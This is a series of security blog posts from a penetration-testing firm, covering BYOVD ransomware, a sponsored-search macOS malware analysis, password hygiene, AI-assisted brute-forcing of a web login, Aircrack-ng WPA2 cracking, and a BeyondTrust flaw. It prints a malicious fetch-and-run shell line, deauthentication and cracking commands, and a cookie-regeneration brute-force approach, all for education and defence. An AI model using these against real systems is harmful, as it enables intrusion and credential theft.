BYOVD Attacks and EDR Evasion: Why Your Endpoint Security May Not Be Enough https://raxis.com/blog/byovd-attacks-and-edr-evasion-why-your-endpoint-security-may-not-be-enough/ Wed, 18 Mar 2026 11:00:00 +0000 https://raxis.com/?p=55760 Your EDR is active. Your antivirus is updated. Your security team gets alerts. So why are ransomware groups still getting through and why are they doing it faster and more quietly than ever?

The answer may lie in a technique called Bring Your Own Vulnerable Driver (BYOVD), and it is fundamentally undermining one of the most trusted layers of enterprise defense.

What Is BYOVD and Why Does It Work?

BYOVD is an attack technique in which a malicious actor introduces a legitimate, digitally signed, but vulnerable software driver onto a target system. Because the driver is signed and trusted by the operating system, it bypasses scrutiny. The attacker then exploits flaws in that driver to reach the Windows kernel, the highest privilege level in the OS. From there, they can do something far more dangerous than exfiltrate data or drop a payload: they can disable your EDR.

This is what makes BYOVD so effective and so frustrating to defend against. Modern endpoint security tools like EDR and XDR largely rely on kernel-level visibility to operate. If an attacker can reach the kernel first and terminate those processes, your security tooling goes dark before the ransomware ever executes.

The technique isn’t new. The Lazarus Group used it as early as 2021; the Cuba and RobbinHood ransomware gangs adopted it shortly after. But what is interesting is how BYOVD attacks have evolved.

The Reynolds Ransomware: A Dangerous Evolution

The most significant recent development in BYOVD is the emergence of Reynolds, a new ransomware family disclosed in February 2026. You may have seen Nathan Anderson’s blog last month alerting IT teams to Reynolds, which doesn’t just use BYOVD; it embeds it directly inside the ransomware payload. Let’s take a deeper dive here.

In traditional BYOVD-assisted ransomware attacks, the evasion component is a separate tool deployed as a precursor step: first kill the EDR, then drop the ransomware. Reynolds collapses these into a single operation. Upon execution, the malware drops a vulnerable NsecSoft NSecKrnl driver (CVE-2025-68947), uses it to terminate security software processes, and then encrypts the victim’s files, all in one bundled payload.

This is a huge leap forward for several reasons:

It’s quieter. No separate EDR-killer tool dropping to disk means fewer detection opportunities before encryption begins.

It’s faster and more streamlined. By combining evasion and encryption, the malware leaves defenders no window to interrupt the attack chain. Barracuda’s 2026 threat data showed that the fastest observed ransomware cases in 2025 took just three hours from initial breach to encryption. Reynolds compresses that window further.

It’s more easily packaged. Bundling defense evasion into the payload makes ransomware attacks easier to carry out, lowering the barrier for affiliates and making Reynolds a more attractive offering in the ransomware-as-a-service (RaaS) ecosystem.

This isn’t an isolated case. Just prior to Reynolds’ disclosure, in a separate incident, attackers weaponized a driver for the EnCase digital forensics suite, turning it into a defense-evasion mechanism.

BYOVD is Quickly Becoming the Dominant Defense Evasion Strategy

The use of defense-impairment tools has increased markedly over the past two years, a direct response to EDR vendors improving their ability to detect pre-ransomware threats. It’s the classic arms race: the better defenders got at spotting the precursors, the more attackers invested in techniques to blind those detectors before deploying their payload.

The EDR killer toolbelt has matured accordingly. Readily available tools include:

  • TrueSightKiller: Leverages the vulnerable “truesight” driver
  • AuKill (BurntCigar/Poortry): Used by LockBit and shares code with the open source Backstab tool
  • GhostDriver: Publicly available, widely used across ransomware groups
  • Warp AVKiller: Uses a vulnerable Avira anti-rootkit driver
  • Gmer: A rootkit scanner repurposed to kill security processes
  • EDRKillShifter: Introduced by RansomHub in 2024; purpose-built to load and exploit vulnerable drivers

These tools are actively traded and sold on criminal forums. In 2023, a tool called Terminator, which claimed to bypass 23 different AV/EDR/XDR products, was publicly advertised on Russian cybercrime forums for anyone willing to pay.

Why Microsoft’s Defenses Have Gaps

The most direct structural defense against BYOVD in the Windows ecosystem is Microsoft’s Vulnerable Driver Blocklist, which prevents known-bad drivers from loading on Windows systems. But even this has limited effectiveness.

Microsoft’s blocklist is updated only once or twice per year, so a newly weaponized driver could be actively used in attacks for months before it’s effectively blocked in the wild. Microsoft must also weigh whether blocking a given driver could break legitimate systems. Blocking a signed driver has collateral consequences, particularly in healthcare, manufacturing, and other sectors running legacy infrastructure.

Windows also loads drivers during the boot process before network connections are established, preventing certificate revocation lists (CRLs) from being checked. This means that even revoked driver signatures may still successfully load in certain Windows configurations.

The net result is that the burden of detecting and mitigating BYOVD activity has largely fallen on EDR vendors, even though their products are the very target of these attacks. Those are not the makings of long-term success.

What Organizations Are Getting Wrong

“We have EDR, so we’re covered.” 

EDR is a critical control, but it is not impervious. If an attacker can reach the kernel before your EDR can flag the behavior, your tooling becomes a spectator. 

“Our drivers are patched.” 

BYOVD attackers don’t need to exploit your drivers. They bring their own. A fully patched environment is still vulnerable if an attacker can load a legitimately signed driver with known-exploitable flaws from elsewhere.

“We’d see the lateral movement before they got to deployment.” 

Sure, that was true when these attacks required separate multi-step operations. Reynolds changed that. Embedded payloads are specifically engineered to eliminate those observable steps.

“We’re not a big enough target.” 

Yes, you are. 

Practical Defenses That Actually Work

No single control or countermeasure eliminates BYOVD risk, but a layered approach can significantly raise the cost of a successful attack.

  • Enable Hypervisor-Protected Code Integrity (HVCI). This Windows feature prevents unsigned or vulnerable drivers from loading at the kernel level. It is the most direct technical control available and should be enabled on modern hardware.
  • Use Microsoft’s Vulnerable Driver Blocklist despite its gaps. The default blocklist is a starting point; supplement it with community resources like the Living Off the Land Drivers (LOLDrivers) project, which tracks a broader set of known-vulnerable drivers.
  • Monitor driver load events where practical. Windows Event ID 7045 (new service installed) and kernel driver load activity should be actively monitored in your SIEM. Unexpected driver loads should trigger immediate investigation.
  • Test your EDR; don’t just trust it. Assessment exercises that specifically target kernel-level evasion techniques will reveal whether your EDR stack and response processes can actually catch BYOVD activity before it’s too late.
  • Don’t rely on detection alone. Behavioral controls, network segmentation, privilege management, and robust incident response planning are critical backstops for when (not if) detection fails.
This isn’t just another malware story. It’s a signal about where threat trends are heading: attackers are actively investing in techniques that neutralize the very security controls organizations have invested in to protect their assets. This attack vector is widespread, commoditized, and rapidly maturing.
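As a sketch of the driver-load monitoring bullet above, assuming events have been exported from the Windows System channel as XML: the `suspicious_installs` helper and the allow-list below are hypothetical illustrations, not a product feature, but they show how Event ID 7045 entries could be triaged.

```python
# Sketch: flag unexpected service/driver installs (Event ID 7045) in an
# exported Windows System event log. The allow-list is purely illustrative.
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
KNOWN_GOOD = {"gupdate", "WinDefend"}  # hypothetical allow-list

def suspicious_installs(xml_text):
    """Return service names from 7045 events that are not on the allow-list."""
    hits = []
    for event in ET.fromstring(xml_text).findall("e:Event", NS):
        if event.findtext("e:System/e:EventID", namespaces=NS) != "7045":
            continue
        for data in event.findall("e:EventData/e:Data", NS):
            if data.get("Name") == "ServiceName" and data.text not in KNOWN_GOOD:
                hits.append(data.text)
    return hits

sample = """<Events xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <Event><System><EventID>7045</EventID></System>
    <EventData><Data Name="ServiceName">truesight</Data></EventData></Event>
</Events>"""

print(suspicious_installs(sample))  # -> ['truesight']
```

In practice the same filter would live as a SIEM rule rather than a script, but the logic, new service installs not on a curated allow-list, is the same.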

The organizations best positioned to survive this evolution are not the ones with the most security products. They’re the ones who regularly test those products against real attack techniques, understand what their stack actually catches, and build response capabilities that don’t depend entirely on tools that can be silenced before the alarm sounds.

I hope you’ll take a look at other blogs in our Security Recommendations series, and, if you’d like to be alerted to new blogs like this in our monthly cybersecurity newsletter, you can sign up here.

Sponsored Malware: When the Bad Guys Pay for Views https://raxis.com/blog/sponsored-malware-when-the-bad-guys-pay-for-views/ Fri, 13 Mar 2026 11:00:00 +0000 https://raxis.com/?p=54926 Today we are going to look at the dangerous side of the Internet. Not the dark web, but search results. 

The Backstory

I was trying to clear up space on my MacBook and found it curious that, after deleting 20GB of no-longer-used virtual machines, my free space did not go up. Instead, the used space just moved from the Documents category to the System Data category. 

I had already emptied the Trash, and my free space did not change. In an effort to understand what was going on, I took to a search engine to try and find out what could be wrong. 

I started with a simple search: “macOS deleted files end up as system data”

At first glance, the second search result appeared to be just what I needed: an article titled “Manage System Data on Mac | Mac Storage Too Full,” with a brief description that fit exactly what I needed to know: “See which system data may take up storage and how to keep macOS organized.”

Sponsored Search Result that is Actually Malware

The first red flag is that this is a Sponsored result, which is when someone pays the search engine to place their search result at the top of the list. Usually this is used by brands to advertise their products. If someone searches for “best 2026 truck,” and you make trucks, you might want to pay some cash to make sure your website is at the top of the list. 

When Malware Enters the Search

The danger lies in malicious actors using this same feature to prey on people who need help or are looking for information. In this case, my very benign search term was purchased by someone to put their blog at the top of the results.

Taking a (cautious) look at the article, I see that this blog wants me to copy and paste a command into my Terminal. That’s red flag number two, and it’s a big one. Let’s analyze the code they want readers to blindly copy and paste. The following has been sanitized. Please do NOT follow along at home:

Malicious Blog

Malicious code:

/bin/zsh -c "$(curl -fsSL $(echo <base64 encoded data> | base64 -d))"

There is a series of nested commands here. The innermost command echoes some text and pipes it to base64 to be decoded. That decoded text is then given to curl as a URL to download. The downloaded content is fed into /bin/zsh to be executed. 

Let’s safely decode this text by turning to CyberChef, a very handy web app that can encode and decode almost anything you can imagine. 

Pasting the code into the Input pane and dragging From Base64 into the Recipe list will give us the decoded data in the Output pane. 

Decoding Message with CyberChef
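If you prefer the command line to a web app, the same From Base64 step is a one-liner in Python. The string below is a harmless round-trip stand-in, not the attacker’s real payload; the point is to decode only and read the result as text, never to execute it.

```python
import base64

# Round-trip demo: an attacker hides a URL as base64; we decode it safely.
# Decode only -- never pipe the result to a shell.
hidden = base64.b64encode(b"https://example.com/payload").decode()
print(hidden)                             # the obfuscated form
print(base64.b64decode(hidden).decode())  # -> https://example.com/payload
```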

Breaking Down the Malicious Code

Here’s the URL that the above command would happily download and execute. I’m going to stand up a quick cloud server to safely download this file for further analysis. After downloading, I take a look, and the file appears to assign some base64-encoded and gzipped data to a variable:

Malicious Command Setting a Variable

I went ahead and copy/pasted the variable assignment and then echoed that variable into a file for further analysis. Reading the file with the contents of that encoded data, I see it’s another script. This time it downloads another file from a web server, saves it to local disk, and sets it as executable:

Variable Assignment Is a Script that Downloads a Malware File from the Internet
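That base64-plus-gzip layer can also be unpacked without ever executing it. This sketch builds a harmless stand-in blob (the inner command and hostname are invented) and then unwraps it the same way the dropper would, minus the execution step:

```python
import base64
import gzip

# Build a stand-in for the malware's encoded blob, then unpack it the same
# way the dropper would -- minus the execution step.
inner = b"curl -o /tmp/payload https://malware.example/bin && chmod +x /tmp/payload"
blob = base64.b64encode(gzip.compress(inner))

script = gzip.decompress(base64.b64decode(blob)).decode()
print(script)  # the inner script, now safe to read as text
```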

Here, I’ve downloaded the file to confirm it’s still available and that it’s a Mach-O binary for macOS systems:

The Downloaded Malware File

Reverse Engineering the Malware File

Since reverse engineering malware is not my strong suit, I used Ghidra to decompile the binary and then consulted our good friend Claude, which analyzed the decompiled code and determined it to be malicious:

Claude Explains Why the Downloaded File is Malicious

Why Staying Vigilant Is Critical

As a professional penetration tester, my day job involves hunting for exploits and vulnerabilities so that I can effectively demonstrate their impact within our clients’ systems. Sometimes this leads me down the rabbit hole of malware and suspicious executables. It is disheartening to see how easily regular Internet users can run across malware, and, if they don’t know what to look for, I can see someone falling for these sponsored ads and running malware on their system.

While I may hunt down and download exploit code during the course of a penetration test, I always validate the code prior to executing on client infrastructure. In fact, most of the time when I run across an exploit for some new CVE, I find out the script is just making a few key API calls. In those cases, I always re-create the exact API calls myself rather than using the published exploit code. 

Join Our Newsletter for More Stories Like This

If you found this helpful, I encourage you to sign up for the Raxis Monthly Newsletter. We don’t share your email or spam you; we just send a monthly email with links to blogs like this and cybersecurity alerts that may help pentest customers and penetration testers alike.

The Hidden Risks in Your Password: What You Type Matters More Than You Think https://raxis.com/blog/hidden-risks-in-your-password/ Tue, 10 Mar 2026 11:00:00 +0000 https://raxis.com/?p=53123 In the ever-evolving landscape of cybersecurity, passwords remain the frontline defense for our digital lives. At Raxis, we specialize in red team engagements and penetration testing, helping organizations identify vulnerabilities before malicious actors can exploit them. 

That often means that our penetration testers gain access (through complicated means I will let them explain in other blogs) to many cleartext passwords. When that happens, they provide statistics about the discovered passwords to our customers.

We find that, while many customers want to know how strong their passwords are, a key concern often flies under the radar: what do those passwords say about the user? Today, I’d like to discuss why choosing the right password goes beyond complexity. It’s also about protecting your privacy and professionalism in ways you might not expect.

The Basics: Unique and Evolving Passwords

Let’s start with the fundamentals. A strong password is your first barrier against unauthorized access, and it should be unique to each account. Think of it this way: reusing the same password across multiple sites is like leaving the same key under every doormat in your neighborhood. If one account gets compromised, all others become vulnerable.

Best practices also recommend changing passwords periodically, especially for critical accounts like email, banking, or work systems. This isn’t just about refreshing for the sake of it; it’s a proactive step to mitigate risks from undetected breaches. If a password has been exposed in a data leak (which happens more often than you’d think), rotating it ensures that old credentials can’t be used against you. Tools like password managers can make this process seamless, generating and storing complex passwords without the hassle of memorization.

But here’s where things get interesting… and potentially awkward. While focusing on length, complexity (mixing uppercase, lowercase, numbers, and symbols), and uniqueness is crucial, the content of your password deserves equal scrutiny.

The Perils of Expressive Passwords

We’ve all had those frustrating days at work where venting feels necessary. But channeling that frustration into your password? That’s a recipe for regret. Passwords like thisJ0bSUCKS2@ or IhateMYb055 might seem like a harmless private joke (after all, who’s going to see them?), but unfortunately, in the world of cybersecurity, passwords aren’t as private as they appear.

During routine security assessments, penetration testers often gain access to systems and work to extract credentials from them. These exercises simulate real-world attacks, attempting to guess or brute-force passwords using dictionaries of common words, variations, and patterns. If your password includes disparaging remarks about yourself, your job, your boss, or your colleagues, it could be cracked and documented in a report. These reports are shared with IT teams and often executives. Imagine your clever quip about hating your manager ending up in a boardroom discussion. Our pentesting team at Raxis has seen it happen.

Password discovered

It gets worse. Cracked passwords from breaches are often leaked onto dark web forums, where cybercriminals trade stolen data. Organizations routinely monitor these spaces as part of their threat intelligence audits. If your password surfaces there, it could reveal more than just a security flaw. It might expose personal sentiments that could damage your professional reputation or lead to uncomfortable conversations.

Self-deprecating passwords fall into the same trap. Something like ImAnIdi0t2023! might feel self-aware and secure due to its complexity, but, if exposed, it could undermine your credibility or invite unwanted scrutiny. You would likely be shocked at how often we see negative messaging in passwords during our testing. 

In a recent engagement, we cracked a high percentage of 12+ character passwords. Many of them contained messaging that the users would very likely not want discovered. Unfortunately, that particular penetration test is not an anomaly. 

The key question to ask yourself when crafting a password: If this were to become public, would I be okay with people seeing it?

Real-World Implications and How to Avoid Them

At Raxis, we’ve seen firsthand how seemingly innocuous choices can lead to bigger issues. Passwords aren’t just strings of characters; they’re potential windows into your mindset.

To stay safe:

  • Aim for Neutral Complexity: Use random combinations or passphrase generators. For example, turn a neutral phrase like @2BlueSkyC0ffeeRain! into something strong yet meaningless to outsiders.
  • Leverage Password Managers: These tools create and store passwords that are complex without being personally revealing.
  • Enable Multi-Factor Authentication (MFA): Even the best password is stronger with a second layer of verification.
  • Think Exposure-First: Always consider the “what if” scenario. Passwords can be exposed through breaches, shoulder-surfing, or even shared devices.
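As a sketch of the first bullet, Python’s secrets module can generate a neutral passphrase. The word list here is a tiny illustrative stand-in; a real generator would use a large list such as the EFF diceware words so the result has meaningful entropy.

```python
import secrets
import string

# Tiny illustrative word list; in practice use a large one such as the
# EFF diceware list so the passphrase has real entropy.
WORDS = ["blue", "sky", "coffee", "rain", "maple", "stone", "river", "cloud"]

def neutral_passphrase(n_words=4):
    """Random words plus digits and a symbol: strong, and says nothing about you."""
    words = [secrets.choice(WORDS).capitalize() for _ in range(n_words)]
    digits = "".join(secrets.choice(string.digits) for _ in range(2))
    symbol = secrets.choice("!@#$%")
    return "".join(words) + digits + symbol

print(neutral_passphrase())  # e.g. 'MapleRainSkyStone41!'
```

Because the words are random and neutral, nothing embarrassing surfaces even if the password is cracked and lands in a report.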

By treating passwords as potentially public artifacts, you not only enhance your security but also safeguard your personal and professional image.

Final Thoughts: Passwords with Purpose

In cybersecurity, the goal is protection – both digital and personal. Unique, regularly updated passwords are essential, but steering clear of ones that disparage or reveal ill thoughts takes your strategy to the next level. At Raxis, we’re committed to helping you build resilient defenses that consider the human element. Remember: A good password doesn’t just lock the door; it ensures that, if the lock is exposed, there’s nothing embarrassing waiting on the other side.

If you’re concerned about your organization’s password policies or want to simulate a real attack to uncover your company’s weaknesses, reach out to Raxis for a consultation. 

AI-Augmented Series: AI Scripting for Brute-Forcing on a Web App Pentest https://raxis.com/blog/ai-augmented-series-ai-scripting-for-brute-forcing-on-a-web-app-pentest/ Wed, 04 Mar 2026 12:00:00 +0000 https://raxis.com/?p=54769 The other day I was on a web application penetration test. During testing I was going through the login functionality to check for common issues like account enumeration and vulnerability to a brute-force attack. 

Normally when doing these checks I capture the request with Burp Suite and then send it to the Repeater tab. From there I make changes and send the request over and over again. On this particular engagement, I kept running into an issue where the request would expire after a short amount of time.

After some investigation I narrowed it down to a particular cookie. With the help of AI, I was able to identify the function that generated the cookie and then reimplement it in Python so I could create my own brute-force script. 

In this blog I’ll go through this process with a lab site to show just how this can be done and what web developers will want to watch for to protect their sites.

Setting Up the Sample Site with a Cookie

First, we need a web server that takes a request. For testing and demonstration, I’m just going to have the app check the cookie and respond when we click a button:

  • If the cookie is old, it will say expired
  • If the cookie is still valid, it will say success

If you’re anything like me, you already have access to a web server with PHP for testing. If not, you can follow along in this blog. Once the test site is set up, we click the button, which sends a request; we intercept that request and send it to Burp Suite’s Repeater tab. We can replay the request and get the expected success message.

Successful Use of New Cookie

Now we have a little bit of time before the cookie expires for our test, but eventually it will expire, as shown.

Cookie Expired

This matches the functionality I saw on my pentest closely enough for a demonstration.

Using AI to Write a Script

Now, in our case, the HTML file isn’t that complex, so you could simply right-click, view the source, and understand what’s happening. But on many modern apps that isn’t the case, as there are thousands of lines of code. Many times the code is also minified, so the function and variable names are single letters and aren’t helpful. 

So, what’s a good way to find the functionality we need?

Breakpoints.

This was the first point where AI made my life easier. It gave me a block of code I could enter into the console that would watch for where the cookie I needed got its value set and then call the debugger so I could take a closer look.

// Intercept cookie setting
const orig = Object.getOwnPropertyDescriptor(Document.prototype, 'cookie');
Object.defineProperty(document, 'cookie', {
  // Keep reads working while we hook writes
  get() { return orig.get.call(this); },
  set(val) {
    if (val.startsWith('AmIExpired')) debugger; // pause when our cookie is set
    orig.set.call(this, val);
  }
});

After running the command (make sure to change the cookie name if yours is different), you can trigger the request; in our example, we click the button. The code then drops us into the debugger, paused on our hook.

Debugger Paused on Our Code

Let’s pay particular attention to the call stack:

Call Stack

We only have three functions in the call stack here, but in real modern apps there could be many more. Now we go through them and search for the code that creates the cookie. Let’s check the send function:

Send Function

Hey, that looks like the code that’s generating the cookie. Here’s where the AI saved me a ton of time: I took the code, gave it to the AI, and asked it to reimplement it in Python.

AI Command and Results

Wow, that was easy, and much faster than doing it manually myself.

Now after changing the target in the script, I ran it and got a 200 Success, so we know it works.
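To show the overall shape of such a script without exposing the target’s actual algorithm, here is a hypothetical sketch: the real cookie routine came from the site’s JavaScript, so the HMAC-signed timestamp, the `KEY` value, and the cookie name below are all invented stand-ins. The point is the structure, minting a fresh cookie for every guess so it never expires mid-attack.

```python
import base64
import hashlib
import hmac
import time

# Hypothetical stand-in for the site's cookie routine. The real algorithm was
# lifted from the target's JavaScript; this HMAC-signed timestamp just shows
# the shape of the brute-force loop.
KEY = b"client-side-secret"  # hypothetical key recovered from the JS

def fresh_cookie():
    """Regenerate a short-lived cookie value, as the page's JS would."""
    ts = str(int(time.time())).encode()
    sig = hmac.new(KEY, ts, hashlib.sha256).hexdigest().encode()
    return base64.b64encode(ts + b":" + sig).decode()

def attempt(password):
    # On a real engagement this would POST the guess with `requests`,
    # minting a fresh cookie for each attempt, e.g.:
    #   requests.post(url, data={"pass": password},
    #                 cookies={"AmIExpired": fresh_cookie()})
    pass

print(fresh_cookie()[:16] + "...")
```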

Some Pointers

I almost always work in a venv with Python. After creating it, I had to install requests and pycryptodome with pip.

Using Venv with Python

At this point I could add functionality to handle whatever else I need, but I’ll leave that for an actual penetration test. As a side note, the pages and scripts used in recreating this exploit for this blog were also generated by AI with my guidance so that I could show the details clearly. 

What the Devs Need to Know

Anything client-side can be replicated, so you can’t rely on client-side code for controls like rate limiting. It may stop a casual user but not someone dedicated to hacking the site. Security controls must be implemented on the server side.
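As a server-side counterpoint, even a simple in-memory sliding-window limiter stops this kind of replay. This is a framework-agnostic sketch (the class and its parameters are illustrative; production systems usually back this with a shared store like Redis):

```python
import time
from collections import defaultdict, deque

class RateLimiter:
    """Allow at most `limit` attempts per `window` seconds, per client key."""

    def __init__(self, limit=5, window=60.0):
        self.limit = limit
        self.window = window
        self.hits = defaultdict(deque)  # key -> timestamps of recent attempts

    def allow(self, key, now=None):
        now = time.monotonic() if now is None else now
        q = self.hits[key]
        while q and now - q[0] > self.window:  # evict attempts outside the window
            q.popleft()
        if len(q) >= self.limit:
            return False  # too many recent attempts: reject
        q.append(now)
        return True

limiter = RateLimiter(limit=3, window=60)
results = [limiter.allow("10.0.0.5", now=t) for t in (0, 1, 2, 3)]
print(results)  # -> [True, True, True, False]
```

Because the check runs on the server, no amount of client-side cookie regeneration gets around it.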

Final Thoughts

Pentests are time-boxed, meaning sales teams work with customers to decide how long testers should have to cover as much as possible and discover the most important vulnerabilities (while staying on budget).

Using AI like we did here saves pentesters time when exploiting important vulnerabilities. In the past, we may not have had time to complete a full exploit to show our customers how important the finding was, or we may have spent that time and limited our time testing other areas.

This is what makes AI so useful. Now we get the best of both worlds, and our customers get even deeper penetration testing results so that they can remediate findings that would leave their organization vulnerable.

Wireless Series: The Aircrack-ng Suite for All Your Wireless Pentesting Needs https://raxis.com/blog/wireless-series-aircrack-ng-for-wireless-pentesting-needs/ Tue, 24 Feb 2026 12:00:00 +0000 https://raxis.com/?p=52094 If you enjoyed my tutorial on Wifite last summer, I’ve got another great wireless penetration testing tool to discuss today. 

The Aircrack-ng suite is an amazing set of tools for Wi-Fi security testing. Its uses range from network monitoring and traffic capture to packet injection and analysis of cryptographic settings. Best of all, it comes built into Kali Linux.

Overview of the Aircrack-ng Suite

Monitor Mode and Packet Capture – Airmon-ng and Airodump-ng

Airmon-ng places your wireless card into monitor mode, and airodump-ng can then passively monitor wireless network traffic and capture packets for further analysis.

Wi-Fi Cracking – Aircrack-ng

Aircrack-ng can help recover WEP keys (if that’s even still a thing) and crack WPA/WPA2-PSK keys using dictionary-based brute-force attacks after the WPA2 handshake has been captured.

Injection and Replay Attacks – Aireplay-ng

Aireplay-ng can perform packet injection, including replay, fake authentication, fragmentation, chop-chop, and ARP-request attacks to facilitate traffic generation for analysis. It also supports deauthentication attacks to force clients to reconnect, enabling handshake capture and revealing hidden SSIDs.

Client-Focused Attacks – Airbase-ng

Airbase-ng can be used to create rogue access points, enabling attacks that specifically target clients instead of access points.

Advanced Utilities – Airserv-ng, Airdecap-ng, and Airolib-ng

Airserv-ng is a wireless card server that allows multiple applications to share wireless cards for testing. Airdecap-ng can decrypt encrypted packet captures when keys are known; Airolib-ng prepares databases for fast WPA key testing.

Visualization and Analysis – Airgraph-ng

Airgraph-ng helps visualize wireless networks and relationships between clients and access points, supporting complex penetration testing scenarios.

Cracking WPA2

Before starting, ensure you have a wireless network card that can capture network traffic and perform packet injection (if needed). I use multiple Alfa network cards and have had great success with them.

Once you’ve got your network card connected, you’ll want to place it in monitor mode. First, we need to find the wireless adapter:

iwconfig
ifconfig

Next, we place the adapter into monitor mode:

airmon-ng start <wireless interface>
airmon-ng start

I’ve accidentally skipped this step before and found that sometimes, when I run airodump-ng, the card is moved into monitor mode automatically. It is still a good idea to run airmon-ng first to ensure the card is properly in monitor mode, because the interface name may change to something like wlan0mon.

Next, let’s perform some basic recon to see what wireless SSIDs are broadcasting and what hosts are out there. For this scenario, we’re looking for the HackMeWiFi network. We also want to confirm it uses WPA2 with PSK authentication, which will allow us to capture the WPA2 handshake for offline cracking:

airodump-ng <wireless interface>
Wireless Recon

Once we’ve identified the network we’re looking for, we need to check the channel it is broadcasting on, the BSSID, and look for any associated clients. We’ll need this information for targeted attacks:

Target Information

Once we’ve gathered all necessary information, we need to set up airodump-ng to capture wireless traffic for when a client associates to the wireless network:

airodump-ng -c <channel> --bssid <access point MAC> -w <file_name> <wireless interface>
Traffic Capture
  • -c is the channel we’re targeting
  • --bssid is the MAC address of the access point
  • -w is the file name prefix for our packet captures
  • wlan0 is our wireless interface (change to what you have)

Once we’ve got the capture running, we’ll need to open another terminal window or tab and perform a deauthentication attack, either by sending a blanket deauth to all connected clients or (my preference) by targeting a specific client, as shown below:

aireplay-ng -0 1 -a <access point MAC> -c <client MAC> <wireless interface>
Deauth Attack
  • -0 is the deauthentication attack mode. The number 1 specifies to send a single deauth packet (use 0 for continuous deauth attack).
  • -a is the MAC address of the access point
  • -c is the MAC address of the client you are deauthing
  • wlan0 is our working interface to perform attacks and captures (change to what you have)

If successful, we should see airodump-ng capture the handshake:

Captured Handshake

Next, we attempt to crack the captured handshake. My preferred methods are hashcat or aircrack-ng. For this instance, we’ll use aircrack-ng to perform the crack. The commands are pretty simple:

aircrack-ng -w <wordlist> -b <access point MAC> <capture file>
Aircrack Commands

If the PSK is discovered in the wordlist, then the results should look something like this:

Password Find

Those are the basics of cracking WPA2 using the Aircrack-ng suite. 
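For the curious, the heavy lifting in that dictionary attack is PBKDF2: each candidate passphrase is stretched into a 256-bit pairwise master key (PMK) with the SSID as the salt, which is why WPA2 cracking is so much slower than hashing a plain wordlist. The derivation itself is a couple of lines of Python, shown here with the well-known IEEE 802.11i test vector:

```python
import hashlib

def wpa2_pmk(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

# IEEE 802.11i test vector: passphrase "password", SSID "IEEE"
pmk = wpa2_pmk("password", "IEEE")
print(pmk.hex())
# -> f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e
```

Aircrack-ng (and hashcat mode 22000) run this same derivation for every word in the list, then verify each PMK against the captured handshake.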

A Final Note

There are more things we can do with this suite, so check back again in the future to see what’s next in our Wireless series.

And, if you’re looking to see how secure your organization’s wireless networks are, take a look at Raxis’ wireless network penetration testing options. We often perform these tests remotely using our Raxis Transporter device, allowing our customers to save money and schedule quickly. 

Reynolds Ransomware BYOVD Eludes EDR Tools https://raxis.com/blog/reynolds-ransomware-byovd-eludes-edr-tools/ Fri, 20 Feb 2026 12:00:00 +0000 https://raxis.com/?p=54122 Ransomware continuously evolves, presenting new challenges for both individuals and organizations. A recent development is the emergence of a sophisticated ransomware named Reynolds, which stands out due to its advanced defense evasion tactics.

Bring Your Own Vulnerable Driver – BYOVD

Reynolds employs a technique known as Bring Your Own Vulnerable Driver (BYOVD) and, unusually, incorporates the evasion capability directly into its payload, making it highly elusive to security measures such as EDR (Endpoint Detection and Response) tools. BYOVD works by exploiting legitimate but flawed software components, allowing the ransomware to hide its malicious activities and bypass detection mechanisms effectively.

In the case of Reynolds, instead of deploying separate tools beforehand to disable security measures, the malicious driver is bundled within the ransomware itself. Upon execution, Reynolds drops an NsecSoft NSecKrnl driver and exploits a known vulnerability (CVE-2025-68947) to terminate the processes of various security programs, effectively evading detection and response mechanisms. The NSecKrnl driver, while legitimately signed, contains a critical flaw that enables attackers to terminate arbitrary processes.

The integration of BYOVD within the ransomware payload poses significant challenges for defenders. By bundling defense evasion capabilities, attackers reduce the noise typically associated with deploying separate tools, making it harder for security systems to detect and respond in time. This tactic not only enhances the effectiveness of the attack but also streamlines the process for affiliates, who no longer need to incorporate additional steps into their operations.

Ransomware Trends

This type of cyber threat demonstrates that attackers are continuously seeking new ways to evade security systems, making it harder for antivirus software and other security measures to detect and neutralize these threats efficiently.

Beyond Reynolds, 2025 saw broader trends in ransomware evolution, with both emerging groups, such as GLOBAL GROUP and Devman, and established entities like LockBit adapting their methods. For instance, LockBit’s updated version incorporates advanced encryption techniques and malicious features, underscoring the dynamic nature of cybercrime.

Reynolds demonstrates the need for organizations to put preemptive measures in place, including penetration tests, vulnerability management, and patch management. 

]]>
BeyondTrust RCE Vulnerability Exploited: Critical 9.9 CVSS Flaw Under Active Attack https://raxis.com/blog/beyondtrust-rce-vulnerability-exploited-critical-9-9-cvss-flaw-under-active-attack/ Tue, 17 Feb 2026 12:00:00 +0000 https://raxis.com/?p=54116 BeyondTrust Remote Support is a privileged access management solution used by IT teams and managed service providers to remotely access and troubleshoot systems across their infrastructure. The software handles some of the most sensitive operations in an organization: remote administrative access, credential management, and privileged session monitoring. This makes it a high-value target for threat actors seeking initial access or lateral movement within enterprise networks.

Critical Pre-Authentication RCE Disclosed

On February 6th, 2026, BeyondTrust disclosed a pre-authentication remote code execution vulnerability carrying a 9.9 CVSS score. The “pre-authentication” designation is particularly concerning because attackers don’t need valid credentials or any prior access to exploit the flaw. They can achieve remote code execution simply by sending specially crafted requests to an exposed BeyondTrust instance, effectively gaining a foothold into the organization’s privileged access infrastructure. All cloud-hosted Remote Support customers were automatically patched on February 2nd, four days before the public disclosure. However, customers with on-premises deployments of BeyondTrust must manually patch the software to remediate the vulnerability.

Active Exploitation Following PoC Release

Less than a week after the disclosure, a public Proof-of-Concept (PoC) was published on GitHub and within a day SOCs began reporting active exploitation attempts. If your organization has an on-premises deployment that is not patched, it should be assumed to be compromised. No additional information has been disclosed about post-exploitation activity or targets.

The Importance of Proactive Monitoring

Beyond the immediate remediation, this incident highlights why proactive monitoring has become non-negotiable. Security teams should be actively monitoring for exploitation attempts against any internet-facing services, especially in the critical 48-72 hour window following a major vulnerability disclosure. Network traffic analysis, behavioral monitoring of remote support sessions, and threat intelligence feeds can provide early warning of compromise attempts before attackers establish persistence.

AI-Accelerated Exploit Development

